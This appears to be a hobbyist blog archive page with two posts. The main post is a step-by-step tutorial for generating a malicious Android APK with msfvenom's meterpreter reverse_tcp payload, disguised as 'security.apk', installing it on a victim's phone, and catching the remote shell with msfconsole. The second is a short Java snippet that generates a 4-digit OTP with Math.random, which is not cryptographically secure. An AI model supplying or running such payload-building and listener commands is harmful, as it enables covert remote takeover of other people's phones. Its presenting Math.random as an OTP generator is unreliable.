Posts

Showing posts from May, 2023

Milicious App For hacking phones using metasploit!!

Image
Creating a milicious payload for mobile hacking using metasploit     Required:  Min 4GB Ram Laptop/Computer  Kali Linux  1.Use cmd on linux: msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.29.209 lport=1234 R>security.apk here,lhost is a attacker IP, lport is a listening port of a attacker. Note:The Attack is performing on a home network. We created the apk successfully.. 2. Download and Install the app on victim phone. (Security.apk) that we have created. 3.In kali linux for listening use cmd:          Follow some cmd in sequence: msfconsole use multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.29.209 set lport 1234 exploit     msfconsole setup exploit started followed above steps. Great!!Connection established. Some Command that can be performed under msfconsole:    Command                   Description     -------...

4 digit OTP Generator!!

Image
 Randomly Generating OTP using Java.. Code:- import java.lang.Math; class otp{ public static void main(String[] args){ System.out.println((int)(Math.random()*10000)); } } Output:- ThankYou!Keep Learning..🔥